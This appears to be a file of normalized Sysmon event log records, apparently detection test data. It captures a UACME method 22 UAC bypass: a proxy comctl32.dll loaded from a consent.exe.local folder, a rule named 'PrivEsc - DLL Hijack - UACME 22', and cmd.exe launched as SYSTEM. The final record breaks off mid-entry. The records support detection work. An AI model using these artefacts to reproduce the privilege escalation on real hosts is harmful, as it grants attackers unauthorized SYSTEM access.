"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:21.9545970Z\"},\"EventRecordID\":\"5450\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:21.036\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7935-5d45-0000-001066ca0701}\"},{\"Name\":\"ProcessId\",\"text\":\"7324\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\WerFault.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Problem Reporting\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 7564 -s 152\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1B59C8D752E031AF4C6B0B02F3780E7156AAEECF,MD5=603A88C6EC5CA36FC9C382F9A2EA9105,SHA256=DFAE5391EA274620F2B025976DC9787051EE416AEB360F68F20B108323924955,IMPHASH=3B9DE67ACC19291D79083D12452FA5BA\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"ParentProcessId\",\"text\":\"7564\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"consent.exe 896 272 00000280644BC500\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\WerFault.exe -u -p 7564 -s 152", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\werfault.exe", "object.process.guid": "747f3d96-7935-5d45-0000-001066ca0701", "object.process.hash.imphash": 
"3B9DE67ACC19291D79083D12452FA5BA", "object.process.hash.md5": "603A88C6EC5CA36FC9C382F9A2EA9105", "object.process.hash.sha1": "1B59C8D752E031AF4C6B0B02F3780E7156AAEECF", "object.process.hash.sha256": "DFAE5391EA274620F2B025976DC9787051EE416AEB360F68F20B108323924955", "object.process.id": "7324", "object.process.meta": "Description:Windows Problem Reporting | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "werfault.exe", "object.process.parent.cmdline": "consent.exe 896 272 00000280644BC500", "object.process.parent.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.parent.guid": "747f3d96-7934-5d45-0000-0010cab90701", "object.process.parent.id": "7564", "object.process.parent.name": "consent.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:21.036Z", "type": "raw", "uuid": "d6803be2-c89f-4b40-acdb-cf8c80989d3f"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:21.1282657Z\"},\"EventRecordID\":\"5449\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:20.686\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"ProcessId\",\"text\":\"7564\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC500\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC500", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-7934-5d45-0000-0010cab90701", "object.process.hash.imphash": 
"522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "7564", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:20.686Z", "type": "raw", "uuid": "7b523ccd-78ce-4af3-8d35-9273f3f6a8da"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:20.7314164Z\"},\"EventRecordID\":\"5448\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:20.405\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010a2a40701}\"},{\"Name\":\"ProcessId\",\"text\":\"4964\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\eventvwr.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Event Viewer Snapin Launcher\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\eventvwr.exe\\\" 
\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1AF3BB8D63A0ED48DF1F1706B791404DEE28524F,MD5=43129C3BFC9746CE9FFE8E45D10FE050,SHA256=BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70,IMPHASH=5843AE9886BB500E05E07EE59BB5AD42\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00104f190601}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5336\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\UACME.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"UACME.exe 22\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\eventvwr.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\eventvwr.exe", "object.process.guid": 
"747f3d96-7934-5d45-0000-0010a2a40701", "object.process.hash.imphash": "5843AE9886BB500E05E07EE59BB5AD42", "object.process.hash.md5": "43129C3BFC9746CE9FFE8E45D10FE050", "object.process.hash.sha1": "1AF3BB8D63A0ED48DF1F1706B791404DEE28524F", "object.process.hash.sha256": "BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70", "object.process.id": "4964", "object.process.meta": "Description:Event Viewer Snapin Launcher | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "eventvwr.exe", "object.process.parent.cmdline": "UACME.exe 22", "object.process.parent.fullpath": "c:\\users\\ieuser\\desktop\\uacme.exe", "object.process.parent.guid": "747f3d96-792d-5d45-0000-00104f190601", "object.process.parent.id": "5336", "object.process.parent.name": "uacme.exe", "object.process.parent.path": "c:\\users\\ieuser\\desktop\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:20.405Z", "type": "raw", "uuid": "a47d229a-2311-48b1-a1ed-bdd13d9c59e0"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:19.9151203Z\"},\"EventRecordID\":\"5447\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:19.888\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7933-5d45-0000-0010227e0701}\"},{\"Name\":\"ProcessId\",\"text\":\"6000\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001055de0601}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4740\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"consent.exe 896 318 0000028064471300\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-7933-5d45-0000-0010227e0701", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", 
"object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "6000", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "consent.exe 896 318 0000028064471300", "object.process.parent.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.parent.guid": "747f3d96-7930-5d45-0000-001055de0601", "object.process.parent.id": "4740", "object.process.parent.name": "consent.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:19.888Z", "type": "raw", "uuid": "b0eb41f3-3f63-4905-ba70-8743cd7bce72"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"7\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"7\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:19.8880688Z\"},\"EventRecordID\":\"5446\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3680\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"PrivEsc - DLL Hijack - UACME 22\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:19.877\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001055de0601}\"},{\"Name\":\"ProcessId\",\"text\":\"4740\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ImageLoaded\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\\\comctl32.dll\"},{\"Name\":\"FileVersion\",\"text\":\"3.1.8.1904\"},{\"Name\":\"Description\",\"text\":\"UACMe proxy DLL\"},{\"Name\":\"Product\",\"text\":\"UACMe\"},{\"Name\":\"Company\",\"text\":\"Hazardous Environments\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B\"},{\"Name\":\"Signed\",\"text\":\"false\"},{\"Name\":\"Signature\"},{\"Name\":\"SignatureStatus\",\"text\":\"Unavailable\"}]}}}", "category.generic": "Executable Module", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": 
"PrivEsc - DLL Hijack - UACME 22", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_7_Image_loaded", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "7", "normalized": true, "object": "module", "object.process.fullpath": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\comctl32.dll", "object.process.hash.imphash": "1C6B5C991BBBDC2B578EA7DEEF4AFA1B", "object.process.hash.md5": "9E5AED3F57CEBC5154F9373B2BB9BA05", "object.process.hash.sha1": "A309A622B9D4A62CFE59B73FDD32BD8384E66628", "object.process.hash.sha256": "FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.meta": "Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous Environments", "object.process.name": "comctl32.dll", "object.process.path": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\", "object.property": "signature status", "object.value": "not signed", "object.version": "3.1.8.1904", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.guid": "747f3d96-7930-5d45-0000-001055de0601", "subject.process.id": "4740", "subject.process.name": "consent.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:19.877Z", "type": "raw", "uuid": "96aa7248-d4dd-4f79-96d5-69b12da589c5"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:16.8537652Z\"},\"EventRecordID\":\"5445\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:16.578\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001085ee0601}\"},{\"Name\":\"ProcessId\",\"text\":\"6388\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\WerFault.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Problem Reporting\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 4740 -s 128\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1B59C8D752E031AF4C6B0B02F3780E7156AAEECF,MD5=603A88C6EC5CA36FC9C382F9A2EA9105,SHA256=DFAE5391EA274620F2B025976DC9787051EE416AEB360F68F20B108323924955,IMPHASH=3B9DE67ACC19291D79083D12452FA5BA\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001055de0601}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4740\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"consent.exe 896 318 0000028064471300\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\WerFault.exe -u -p 4740 -s 128", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\werfault.exe", "object.process.guid": "747f3d96-7930-5d45-0000-001085ee0601", "object.process.hash.imphash": 
"3B9DE67ACC19291D79083D12452FA5BA", "object.process.hash.md5": "603A88C6EC5CA36FC9C382F9A2EA9105", "object.process.hash.sha1": "1B59C8D752E031AF4C6B0B02F3780E7156AAEECF", "object.process.hash.sha256": "DFAE5391EA274620F2B025976DC9787051EE416AEB360F68F20B108323924955", "object.process.id": "6388", "object.process.meta": "Description:Windows Problem Reporting | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "werfault.exe", "object.process.parent.cmdline": "consent.exe 896 318 0000028064471300", "object.process.parent.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.parent.guid": "747f3d96-7930-5d45-0000-001055de0601", "object.process.parent.id": "4740", "object.process.parent.name": "consent.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", 